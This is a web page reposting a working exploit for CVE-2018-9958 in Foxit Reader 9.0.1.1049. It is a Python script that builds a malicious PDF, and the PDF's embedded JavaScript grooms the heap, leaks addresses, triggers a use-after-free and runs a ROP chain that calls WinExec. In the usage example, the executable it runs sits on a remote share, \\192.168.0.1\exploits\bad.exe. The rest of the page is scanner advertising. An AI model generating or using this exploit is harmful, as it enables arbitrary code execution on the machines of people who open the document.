foxit reader 9.0.1.1049 arbitrary code execution

▸▸▸ Exploit & Vulnerability >>   local exploit & windows vulnerability




Online Vulnerability Scanner Tools
foxit reader 9.0.1.1049 arbitrary code execution Code Code... 
				
# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution
# Date: August 29, 2020
# Exploit Author: CrossWire
# Vendor Homepage: https://www.foxitsoftware.com/
# Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
# Version: 9.0.1.1049
# Tested on: Microsoft Windows Server 2016 10.0.14393
# CVE : [2018-9958](https://nvd.nist.gov/vuln/detail/CVE-2018-9958)

#!/usr/bin/python3

'''
===========================================================================
|   PDF generator for Foxit Reader Remote Code Execution (CVE 2018-9958)  |  
===========================================================================
| Written by: Kevin Dorland (CrossWire)                                   |
| Date: 08/29/2020                                                        |
|                                                                         |
| Exploit originally discovered by Steven Seeley (mr_me) of Source Incite |
|                                                                         |
| References:                                                             |
|   https://www.exploit-db.com/exploits/44941 (Steven Seely Calc.exe PoC) |
|   https://www.exploit-db.com/exploits/45269 (Metasploit adaptation)     |
|                                                                         |
===========================================================================
'''


PDF_TEMPLATE = '''
%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (

var heap_ptr   = 0;
var foxit_base = 0;
var pwn_array  = [];

function prepare_heap(size){
    var arr = new Array(size);
    for(var i = 0; i < size; i++){
        arr[i] = this.addAnnot({type: "Text"});;
        if (typeof arr[i] == "object"){
            arr[i].destroy();
        }
    }
}

function gc() {
    const maxMallocBytes = 128 * 0x100000;
    for (var i = 0; i < 3; i++) {
        var x = new ArrayBuffer(maxMallocBytes);
    }
}

function alloc_at_leak(){
    for (var i = 0; i < 0x64; i++){
        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
    }
}

function control_memory(){
    for (var i = 0; i < 0x64; i++){
        for (var j = 0; j < pwn_array[i].length; j++){
            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
        }
    }
}

function leak_vtable(){
    var a = this.addAnnot({type: "Text"});

    a.destroy();
    gc();

    prepare_heap(0x400);
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);

    var leaked = stolen[0] & 0xffff0000;
    foxit_base = leaked - 0x01f50000;
}

function leak_heap_chunk(){
    var a = this.addAnnot({type: "Text"});
    a.destroy();
    prepare_heap(0x400);

    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);

    alloc_at_leak();
    heap_ptr = stolen[1];
}

function reclaim(){
    var arr = new Array(0x10);
    for (var i = 0; i < arr.length; i++) {
        arr[i] = new ArrayBuffer(0x60);
        var rop = new Int32Array(arr[i]);

        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
        rop[0x02] = 0x72727272;              // junk
        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
        rop[0x04] = 0xffffffff;              // ret of WinExec
        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
        
        //Path to executable

<PATH TO EXECUTABLE>
        
        //End Path to executable

        rop[0x17] = 0x00000000;              // adios, amigo
    }
}

function trigger_uaf(){
    var that = this;
    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
    var arr = [1];
    Object.defineProperties(arr,{
        "0":{
            get: function () {

                that.getAnnot(0, "uaf").destroy();

                reclaim();
                return 1;
            }
        }
    });

    a.point = arr;
}

function main(){
    leak_heap_chunk();
    leak_vtable();
    control_memory();
    trigger_uaf();
}

if (app.platform == "WIN"){
    if (app.isFoxit == "Foxit Reader"){
        if (app.appFoxitVersion == "9.0.1.1049"){
            main();
        }
    }
}

)>> trailer <</Root 1 0 R>>
'''

import sys

#Enforces 2 hex char byte notation. "0" becomes "0x00"
def format_byte(b):

    if (len(b) > 2) and (b[0:2] == '0x'):
        b = b[2:]

    if len(b) == 1:
        b = '0' + b

    return '0x' + b

def char2hex(c):
    return format_byte(hex(ord(c)))

#Converts file path into array of eleven 32-bit hex words
def path_to_machine_code(path,little_endian = True):

    print("[+] Encoding Path:",path)

    #ensure length
    if len(path) > 44:
        print("[CRITICAL] Path length greater than 44 characters (bytes). Aborting!")
        exit(-1)

    #Copy path into 4 character (32 bit) words (max 11)
    word_array = []
    for i in range(11):
        
        word = ''

        if len(path):
            word += path[0:4] if len(path) >= 4 else path
            path = path[len(word):]
        
        if len(word) < 4:
            word += chr(0) * (4 - len(word))

        word_array.append(word)

    #Convert chars to hex values and format to "0xAABBCCDD" notation
    hex_array = []
    for word in word_array:
            
        #Reverse byte order to fit little endian standard
        if(little_endian): word = word[::-1]

        #Write bytes to hex strings
        hex_string = '0x'
        for char in word:
            hex_string += char2hex(char)[2:] #strip the 0x off the byte here

        hex_array.append(hex_string)
   
    return hex_array

#writes encoded path to rop array to match template
def create_rop(hex_arr, start_index = '0c'):

    ord_array = []

    index = int(start_index,16)

    for instruction in hex_arr:

        full_instruction = f"\trop[{format_byte(hex(index))}] = {instruction};"

        ord_array.append(full_instruction)
    
        index += 1

    return ('\n'.join(ord_array))
    
    

if __name__ == '__main__':
    
    if len(sys.argv) != 3:
        print(f"USAGE: {sys.argv[0]} <path to executable> <pdf filename>")
        print("-- EXAMPLES --")
        print(f"{sys.argv[0]} \\\\192.168.0.1\\exploits\\bad.exe evil.pdf")

        exit(-1)

    #Parse user args
    EXE_PATH = sys.argv[1] 
    PDF_PATH = sys.argv[2]

    #Generate hex
    raw_hex = path_to_machine_code(EXE_PATH)

    print("[+] Machine Code:")
    for hex_word in raw_hex:
        print(hex_word)

    ord_string = create_rop(raw_hex)

    print("[+] Instructions to add:")
    print(ord_string)

    print("[+] Generating pdf...")

    print("\t- Filling template...")
    evil_pdf = PDF_TEMPLATE.replace('<PATH TO EXECUTABLE>',ord_string)
    
    print("\t- Writing file...")
    with open(PDF_PATH,'w') as fd:
        fd.write(evil_pdf)

    print("[+] Generated pdf:",PDF_PATH)

Foxit reader 9.0.1.1049 arbitrary code execution Vulnerability / Exploit Source : Foxit reader 9.0.1.1049 arbitrary code execution



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.